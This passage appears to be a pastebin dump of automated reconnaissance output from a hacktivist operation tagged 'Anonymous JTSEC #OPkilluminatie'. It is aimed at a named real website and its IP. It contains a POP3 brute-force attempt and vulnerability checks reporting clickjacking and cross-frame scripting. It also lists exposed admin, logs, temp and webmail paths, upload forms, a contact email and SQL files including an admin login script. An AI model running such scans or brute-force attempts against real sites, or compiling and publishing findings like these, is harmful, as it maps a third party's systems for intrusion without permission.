  1325. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1326. |_[ + ] More details::  / -  / , ISP:
  1327. |_[ + ] Found:: UNIDENTIFIED
  1328.  
  1329.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1330. |_[ + ] [ 6 / 13 ]-[22:42:09] [ - ]
  1331. |_[ + ] Target:: [ http://www.glmasonica.com/history_glm.php?l=en ]
  1332. |_[ + ] Exploit::
  1333. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1334. |_[ + ] More details::  / -  / , ISP:
  1335. |_[ + ] Found:: UNIDENTIFIED
  1336.  
  1337.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1338. |_[ + ] [ 7 / 13 ]-[22:42:12] [ - ]
  1339. |_[ + ] Target:: [ http://www.glmasonica.com/history_freemasonry.php?l=en ]
  1340. |_[ + ] Exploit::
  1341. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1342. |_[ + ] More details::  / -  / , ISP:
  1343. |_[ + ] Found:: UNIDENTIFIED
  1344.  
  1345.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1346. |_[ + ] [ 8 / 13 ]-[22:42:14] [ - ]
  1347. |_[ + ] Target:: [ http://www.glmasonica.com/introduction.php?l=fr ]
  1348. |_[ + ] Exploit::
  1349. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1350. |_[ + ] More details::  / -  / , ISP:
  1351. |_[ + ] Found:: UNIDENTIFIED
  1352.  
  1353.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1354. |_[ + ] [ 9 / 13 ]-[22:42:18] [ - ]
  1355. |_[ + ] Target:: [ http://glmasonica.com/display/files/agm_fr.pdf ]
  1356. |_[ + ] Exploit::
  1357. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1358. |_[ + ] More details::  / -  / , ISP:
  1359. |_[ + ] Found:: UNIDENTIFIED
  1360.  
  1361.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1362. |_[ + ] [ 10 / 13 ]-[22:42:21] [ - ]
  1363. |_[ + ] Target:: [ http://www.glmasonica.com/display/files/agminfo_fr.pdf ]
  1364. |_[ + ] Exploit::
  1365. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1366. |_[ + ] More details::  / -  / , ISP:
  1367. |_[ + ] Found:: UNIDENTIFIED
  1368.  
  1369.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1370. |_[ + ] [ 11 / 13 ]-[22:42:26] [ - ]
  1371. |_[ + ] Target:: [ http://glmasonica.com/display/files/agm_en.pdf ]
  1372. |_[ + ] Exploit::
  1373. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1374. |_[ + ] More details::  / -  / , ISP:
  1375. |_[ + ] Found:: UNIDENTIFIED
  1376.  
  1377.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1378. |_[ + ] [ 12 / 13 ]-[22:42:29] [ - ]
  1379. |_[ + ] Target:: [ http://glmasonica.com/display/files/agminfo_en.pdf ]
  1380. |_[ + ] Exploit::
  1381. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1382. |_[ + ] More details::  / -  / , ISP:
  1383. |_[ + ] Found:: UNIDENTIFIED
  1384.  
  1385. [ INFO ] [ Shutting down ]
  1386. [ INFO ] [ End of process INURLBR at [15-04-2018 22:42:29]
  1387. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  1388. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-glmasonica.com.txt  ]
  1389. |_________________________________________________________________________________________
  1390.  
  1391. \_________________________________________________________________________________________/
  1392.  
  1393.  + -- --=[Port 110 opened... running tests...
  1394. Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 22:42 EDT
  1395. Nmap scan report for glmasonica.com (192.252.149.45)
  1396. Host is up (0.45s latency).
  1397.  
  1398. PORT    STATE SERVICE VERSION
  1399. 110/tcp open  pop3    Dovecot pop3d
  1400. | pop3-brute:
  1401. |   Accounts: No valid accounts found
  1402. |   Statistics: Performed 55 guesses in 42 seconds, average tps: 1.5
  1403. |_  ERROR: Failed to connect.
  1404. |_pop3-capabilities: STLS RESP-CODES AUTH-RESP-CODE CAPA USER PIPELINING SASL(PLAIN) UIDL TOP
  1405. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1406. Device type: WAP|general purpose
  1407. Running (JUST GUESSING): D-Link embedded (98%), TRENDnet embedded (98%), Linux 2.6.X (95%)
  1408. OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp cpe:/o:linux:linux_kernel:2.6
  1409. Aggressive OS guesses: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP (98%), Linux 2.6.18 - 2.6.22 (95%), Linux 2.6.18 (88%)
  1410. No exact OS matches for host (test conditions non-ideal).
  1411. Network Distance: 1 hop
  1412.  
  1413. TRACEROUTE (using port 443/tcp)
  1414. HOP RTT       ADDRESS
  1415. 1   466.69 ms 192.252.149.45
  1416.  
  1417. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1418. Nmap done: 1 IP address (1 host up) scanned in 60.11 seconds
  1419.  + -- --=[Port 111 closed... skipping.
  1420.  + -- --=[Port 123 closed... skipping.
  1421.  + -- --=[Port 135 closed... skipping.
  1422.  + -- --=[Port 139 closed... skipping.
  1423.  + -- --=[Port 161 closed... skipping.
  1424.  + -- --=[Port 162 closed... skipping.
  1425.  + -- --=[Port 389 closed... skipping.
  1426.  + -- --=[Port 443 opened... running tests...
  1427. ====================================================================================
  1428.  CHECKING FOR WAF
  1429. ====================================================================================
  1430.  
  1431.                                  ^     ^
  1432.         _   __  _   ____ _   __  _    _   ____
  1433.        ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1434.       | V V // o // _/ | V V // 0 // 0 // _/
  1435.       |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
  1436.                                 <
  1437.                                  ...'
  1438.  
  1439.     WAFW00F - Web Application Firewall Detection Tool
  1440.  
  1441.     By Sandro Gauci && Wendel G. Henrique
  1442.  
  1443. Checking https://glmasonica.com
  1444. Generic Detection results:
  1445. No WAF detected by the generic detection
  1446. Number of requests: 13
  1447.  
  1448. ====================================================================================
  1449.  GATHERING HTTP INFO
  1450. ====================================================================================
  1451. ====================================================================================
  1452.  CHECKING HTTP HEADERS AND METHODS
  1453. ====================================================================================
  1454.  
  1455.     __  ______ _____
  1456.     \ \/ / ___|_   _|
  1457.      \  /\___ \ | |  
  1458.      /  \ ___) || |  
  1459.     /_/\_|____/ |_|  
  1460.  
  1461. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  1462. + -- --=[Target: glmasonica.com:443
  1463. + -- --=[Site not vulnerable to Cross-Site Tracing!
  1464. + -- --=[Site not vulnerable to Host Header Injection!
  1465. + -- --=[Site vulnerable to Cross-Frame Scripting!
  1466. + -- --=[Site vulnerable to Clickjacking!
  1467.  
  1468.  
  1469. HTTP/1.1 400 Bad Request
  1470. Date: Mon, 16 Apr 2018 02:44:07 GMT
  1471. Server: Apache
  1472. Content-Length: 362
  1473. Connection: close
  1474. Content-Type: text/html; charset=iso-8859-1
  1475.  
  1476. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1477. <html><head>
  1478. <title>400 Bad Request</title>
  1479. </head><body>
  1480. <h1>Bad Request</h1>
  1481. <p>Your browser sent a request that this server could not understand.<br />
  1482. Reason: You're speaking plain HTTP to an SSL-enabled server port.<br />
  1483.  Instead use the HTTPS scheme to access this URL, please.<br />
  1484. </p>
  1485. </body></html>
  1486.  
  1487.  
  1488.  
  1489. ====================================================================================
  1490.  CHECKING HTTP HEADERS
  1491. ====================================================================================
  1492. + -- --=[Checking if X-Content options are enabled on glmasonica.com...
  1493.  
  1494. + -- --=[Checking if X-Frame options are enabled on glmasonica.com...
  1495.  
  1496. + -- --=[Checking if X-XSS-Protection header is enabled on glmasonica.com...
  1497.  
  1498. + -- --=[Checking HTTP methods on glmasonica.com...
  1499.  
  1500. + -- --=[Checking if TRACE method is enabled on glmasonica.com...
  1501.  
  1502. + -- --=[Checking for META tags on glmasonica.com...
  1503. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  1504. <meta name="Keywords" content="" />
  1505. <meta name="Description" content="" />
  1506.  
  1507. + -- --=[Checking for open proxy on glmasonica.com...
  1508.  
  1509. + -- --=[Enumerating software on glmasonica.com...
  1510. Server: Apache
  1511.  
  1512. + -- --=[Checking if Strict-Transport-Security is enabled on glmasonica.com...
  1513.  
  1514. + -- --=[Checking for Flash cross-domain policy on glmasonica.com...
  1515. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1516. <html><head>
  1517. <title>404 Not Found</title>
  1518. </head><body>
  1519. <h1>Not Found</h1>
  1520. <p>The requested URL /crossdomain.xml was not found on this server.</p>
  1521. <p>Additionally, a 404 Not Found
  1522. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1523. </body></html>
  1524.  
  1525. + -- --=[Checking for Silverlight cross-domain policy on glmasonica.com...
  1526. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1527. <html><head>
  1528. <title>404 Not Found</title>
  1529. </head><body>
  1530. <h1>Not Found</h1>
  1531. <p>The requested URL /clientaccesspolicy.xml was not found on this server.</p>
  1532. <p>Additionally, a 404 Not Found
  1533. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1534. </body></html>
  1535.  
  1536. + -- --=[Checking for HTML5 cross-origin resource sharing on glmasonica.com...
  1537.  
  1538. + -- --=[Retrieving robots.txt on glmasonica.com...
  1539. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1540. <html><head>
  1541. <title>404 Not Found</title>
  1542. </head><body>
  1543. <h1>Not Found</h1>
  1544. <p>The requested URL /robots.txt was not found on this server.</p>
  1545. <p>Additionally, a 404 Not Found
  1546. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1547. </body></html>
  1548.  
  1549. + -- --=[Retrieving sitemap.xml on glmasonica.com...
  1550. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1551. <html><head>
  1552. <title>404 Not Found</title>
  1553. </head><body>
  1554. <h1>Not Found</h1>
  1555. <p>The requested URL /sitemap.xml was not found on this server.</p>
  1556. <p>Additionally, a 404 Not Found
  1557. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1558. </body></html>
  1559.  
  1560. + -- --=[Checking cookie attributes on glmasonica.com...
  1561. Set-Cookie: projector=0ea8bbc3426586fe0d4e2372714cf441; path=/
  1562.  
  1563. + -- --=[Checking for ASP.NET Detailed Errors on glmasonica.com...
  1564. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1565. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1566.  
  1567.  
  1568. #######################################################################################################################################
  1569.  
  1570.  
  1571.  
  1572.  AVAILABLE PLUGINS
  1573.  -----------------
  1574.  
  1575.   PluginCertInfo
  1576.   PluginCompression
  1577.   PluginChromeSha1Deprecation
  1578.   PluginSessionResumption
  1579.   PluginOpenSSLCipherSuites
  1580.   PluginSessionRenegotiation
  1581.   PluginHSTS
  1582.   PluginHeartbleed
  1583.  
  1584.  
  1585.  
  1586.  CHECKING HOST(S) AVAILABILITY
  1587.  -----------------------------
  1588.  
  1589.    glmasonica.com:443                  => 192.252.149.45:443
  1590.  
  1591.  
  1592.  
  1593.  SCAN RESULTS FOR GLMASONICA.COM:443 - 192.252.149.45:443
  1594.  --------------------------------------------------------
  1595.  
  1596.   * Deflate Compression:
  1597.       OK - Compression disabled          
  1598.  
  1599.   * Session Renegotiation:
  1600.       Client-initiated Renegotiations:   OK - Rejected
  1601.       Secure Renegotiation:              OK - Supported
  1602.  
  1603.   * Certificate - Content:
  1604.       SHA1 Fingerprint:                  a7aea2027082ba92402a9ea0fe1cb9cf36134a9f
  1605.       Common Name:                       server308.com
  1606.       Issuer:                            Let's Encrypt Authority X3
  1607.       Serial Number:                     036C4ABFF2559BE25A7E96F14E6764FEE474
  1608.       Not Before:                        Mar  4 07:30:28 2018 GMT
  1609.       Not After:                         Jun  2 07:30:28 2018 GMT
  1610.       Signature Algorithm:               sha256WithRSAEncryption
  1611.       Public Key Algorithm:              rsaEncryption
  1612.       Key Size:                          2048 bit
  1613.       Exponent:                          65537 (0x10001)
  1614.       X509v3 Subject Alternative Name:   {'DNS': ['server308.com', 'www.server308.com']}
  1615.  
  1616.   * Certificate - Trust:
  1617.       Hostname Validation:               FAILED - Certificate does NOT match glmasonica.com
  1618.       Google CA Store (09/2015):         FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
  1619.       Java 6 CA Store (Update 65):       OK - Certificate is trusted
  1620.       Microsoft CA Store (09/2015):      OK - Certificate is trusted
  1621.       Mozilla NSS CA Store (09/2015):    OK - Certificate is trusted
  1622.       Apple CA Store (OS X 10.10.5):     OK - Certificate is trusted
  1623.       Certificate Chain Received:        ['server308.com', "Let's Encrypt Authority X3"]
  1624.  
  1625.   * Certificate - OCSP Stapling:
  1626.       NOT SUPPORTED - Server did not send back an OCSP response.
  1627.  
  1628.   * SSLV2 Cipher Suites:
  1629.       Server rejected all cipher suites.
  1630.  
  1631.   * Session Resumption:
  1632.       With Session IDs:                  OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  1633.       With TLS Session Tickets:          OK - Supported
  1634.  
  1635.   * SSLV3 Cipher Suites:
  1636.       Server rejected all cipher suites.
  1637.  
  1638.  
  1639.  
  1640.  SCAN COMPLETED IN 9.64 S
  1641.  ------------------------
  1642. Version: 1.11.11-static
  1643. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1644.  
  1645. Connected to 192.252.149.45
  1646.  
  1647. Testing SSL server glmasonica.com on port 443 using SNI name glmasonica.com
  1648.  
  1649.   TLS Fallback SCSV:
  1650. Server supports TLS Fallback SCSV
  1651.  
  1652.   TLS renegotiation:
  1653. Secure session renegotiation supported
  1654.  
  1655.   TLS Compression:
  1656. Compression disabled
  1657.  
  1658.   Heartbleed:
  1659. TLS 1.2 not vulnerable to heartbleed
  1660. TLS 1.1 not vulnerable to heartbleed
  1661. TLS 1.0 not vulnerable to heartbleed
  1662.  
  1663.   Supported Server Cipher(s):
  1664. Preferred TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
  1665. Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve P-256 DHE 256
  1666. Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA384       Curve P-256 DHE 256
  1667. Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA256       Curve P-256 DHE 256
  1668. Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-GCM-SHA384     DHE 2048 bits
  1669. Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA256         DHE 2048 bits
  1670. Accepted  TLSv1.2  256 bits  AES256-GCM-SHA384            
  1671. Accepted  TLSv1.2  256 bits  AES256-SHA256                
  1672. Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-GCM-SHA256     DHE 2048 bits
  1673. Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-SHA256         DHE 2048 bits
  1674. Accepted  TLSv1.2  128 bits  AES128-GCM-SHA256            
  1675. Accepted  TLSv1.2  128 bits  AES128-SHA256                
  1676. Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
  1677. Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
  1678. Accepted  TLSv1.2  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 2048 bits
  1679. Accepted  TLSv1.2  256 bits  AES256-SHA                  
  1680. Accepted  TLSv1.2  256 bits  CAMELLIA256-SHA              
  1681. Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
  1682. Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
  1683. Accepted  TLSv1.2  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 2048 bits
  1684. Accepted  TLSv1.2  128 bits  AES128-SHA                  
  1685. Accepted  TLSv1.2  128 bits  CAMELLIA128-SHA              
  1686. Preferred TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
  1687. Accepted  TLSv1.1  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
  1688. Accepted  TLSv1.1  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 2048 bits
  1689. Accepted  TLSv1.1  256 bits  AES256-SHA                  
  1690. Accepted  TLSv1.1  256 bits  CAMELLIA256-SHA              
  1691. Accepted  TLSv1.1  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
  1692. Accepted  TLSv1.1  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
  1693. Accepted  TLSv1.1  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 2048 bits
  1694. Accepted  TLSv1.1  128 bits  AES128-SHA                  
  1695. Accepted  TLSv1.1  128 bits  CAMELLIA128-SHA              
  1696. Preferred TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
  1697. Accepted  TLSv1.0  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
  1698. Accepted  TLSv1.0  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 2048 bits
  1699. Accepted  TLSv1.0  256 bits  AES256-SHA                  
  1700. Accepted  TLSv1.0  256 bits  CAMELLIA256-SHA              
  1701. Accepted  TLSv1.0  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
  1702. Accepted  TLSv1.0  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
  1703. Accepted  TLSv1.0  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 2048 bits
  1704. Accepted  TLSv1.0  128 bits  AES128-SHA                  
  1705. Accepted  TLSv1.0  128 bits  CAMELLIA128-SHA              
  1706.  
  1707.   SSL Certificate:
  1708. Signature Algorithm: sha256WithRSAEncryption
  1709. RSA Key Strength:    2048
  1710.  
  1711. Subject:  server308.com
  1712. Altnames: DNS:server308.com, DNS:www.server308.com
  1713. Issuer:   Let's Encrypt Authority X3
  1714.  
  1715. Not valid before: Mar  4 07:30:28 2018 GMT
  1716. Not valid after:  Jun  2 07:30:28 2018 GMT
  1717.  
  1718. #######################################################################################################################################
  1719.   oooooo   oooo       .o.        .oooooo..o ooooo     ooo   .oooooo.
  1720.    `888.   .8'       .888.      d8P'    `Y8 `888'     `8'  d8P'  `Y8b
  1721.     `888. .8'       .88888.     Y88bo.       888       8  888      888
  1722.      `888.8'       .8' `888.     `ZY8888o.   888       8  888      888
  1723.       `888'       .88ooo8888.        `0Y88b  888       8  888      888
  1724.        888       .8'     `888.  oo     .d8P  `88.    .8'  `88b    d88'
  1725.       o888o     o88o     o8888o 88888888P'     `YbodP'     `Y8bood8P'
  1726. Welcome to Yasuo v2.3
  1727. Author: Saurabh Harit (@0xsauby) | Contribution & Coolness: Stephen Hall (@logicalsec)
  1728. #######################################################################################################################################
  1729.  
  1730. I, [2018-04-15T22:48:14.755835 #20153]  INFO -- : Initiating port scan
  1731. I, [2018-04-15T22:55:51.933080 #20153]  INFO -- : Using nmap scan output file logs/nmap_output_2018-04-15_22-48-14.xml
  1732. I, [2018-04-15T22:55:51.972547 #20153]  INFO -- : Discovered open port: 192.252.149.45:80
  1733. I, [2018-04-15T22:55:53.785944 #20153]  INFO -- : Discovered open port: 192.252.149.45:443
  1734. I, [2018-04-15T22:55:57.648350 #20153]  INFO -- : Discovered open port: 192.252.149.45:993
  1735. I, [2018-04-15T22:56:01.484324 #20153]  INFO -- : Discovered open port: 192.252.149.45:995
  1736. I, [2018-04-15T22:56:05.310305 #20153]  INFO -- : <<<Enumerating vulnerable applications>>>
  1737. #######################################################################################################################################
  1738.  
  1739. Scan date: 15-4-2018 22:9:2
  1740. =======================================================================================================================================
  1741. | Domain: http://glmasonica.com/
  1742. | Server: Apache
  1743. | IP: 192.252.149.45
  1744. =======================================================================================================================================
  1745. |
  1746. | Directory check:
  1747. | [+] CODE: 200 URL: http://glmasonica.com/admin/
  1748. | [+] CODE: 302 URL: http://glmasonica.com/ajax/
  1749. | [+] CODE: 200 URL: http://glmasonica.com/contact/
  1750. | [+] CODE: 200 URL: http://glmasonica.com/data/
  1751. | [+] CODE: 200 URL: http://glmasonica.com/cp/
  1752. | [+] CODE: 200 URL: http://glmasonica.com/faq/
  1753. | [+] CODE: 200 URL: http://glmasonica.com/index/
  1754. | [+] CODE: 200 URL: http://glmasonica.com/logs/
  1755. | [+] CODE: 200 URL: http://glmasonica.com/modules/
  1756. | [+] CODE: 200 URL: http://glmasonica.com/temp/
  1757. =======================================================================================================================================
  1758. |                                                                                                  
  1759. | File check:
  1760. | [+] CODE: 200 URL: http://glmasonica.com/admin/index.php
  1761. | [+] CODE: 200 URL: http://glmasonica.com/cp/rac/nsManager.cgi
  1762. | [+] CODE: 200 URL: http://glmasonica.com/faq.php
  1763. | [+] CODE: 200 URL: http://glmasonica.com/index.php
  1764. | [+] CODE: 200 URL: http://glmasonica.com/webmail/lib/emailreader_execute_on_each_page.inc.php
  1765. | [+] CODE: 200 URL: http://glmasonica.com/webmail/blank.html
  1766. | [+] CODE: 200 URL: http://glmasonica.com/webmail/horde/test.php
  1767. | [+] CODE: 200 URL: http://glmasonica.com/webmail/src/read_body.php
  1768. | [+] CODE: 200 URL: http://glmasonica.com/webmail/src/configtest.php
  1769. =======================================================================================================================================
  1770. |
  1771. | Check robots.txt:
  1772. |
  1773. | Check sitemap.xml:
  1774. ======================================================================================================================================
  1775. |
  1776. | Crawler Started:
  1777. | Plugin name: E-mail Detection v.1.1 Loaded.
  1778. | Plugin name: phpinfo() Disclosure v.1 Loaded.
  1779. | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
  1780. | Plugin name: FCKeditor upload test v.1 Loaded.
  1781. | Plugin name: Upload Form Detect v.1.1 Loaded.
  1782. | Plugin name: External Host Detect v.1.2 Loaded.
  1783. | Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
  1784. | Plugin name: Code Disclosure v.1.1 Loaded.
  1785. | [+] Max Requests: 15000            
  1786. | [+] Crawling finished, 86011 URL's found!
  1787. |
  1788. | E-mails:
  1789. | [+] E-mail Found: glmasonica@intnet.mu
  1790. |
  1791. | PHPinfo() Disclosure:
  1792. |
  1793. | Timthumb:
  1794. |
  1795. | FCKeditor File Upload:
  1796. |
  1797. | File Upload Forms:
  1798. | [+] Upload Form Found: http://glmasonica.com/display/interfaces/forms.categories.add.tpl.html
  1799. | [+] Upload Form Found: http://glmasonica.com/display/interfaces/forms.membersimage.update.tpl.html
  1800. |
  1801. | External hosts:
  1802. | [+] External Host Found: https://cp.server308.com
  1803. |
  1804. | Web Backdoors:
  1805. |
  1806. | Source Code Disclosure:
  1807. |
  1808. | Ignored Files:
  1809. | http://glmasonica.com/data/sql/categories_add.sql
  1810. | http://glmasonica.com/data/sql/setup_maincategories.sql
  1811. | http://glmasonica.com/data/sql/z_cms_updateContentbyID.sql
  1812. | http://glmasonica.com/data/sql/cms_createContent.sql
  1813. | http://glmasonica.com/data/sql/cms_listPages.sql
  1814. | http://glmasonica.com/data/sql/cms_getPageData_all.sql
  1815. | http://glmasonica.com/data/sql/categories_list.sql
  1816. | http://glmasonica.com/data/sql/cms_getContent.sql
  1817. | http://glmasonica.com/data/sql/admin_login.sql
  1818. =======================================================================================================================================
  1819.  #####################################################################################################################################
  1820.                                             Anonymous JTSEC #OPkilluminatie full recon #18
RAW Paste Data
Top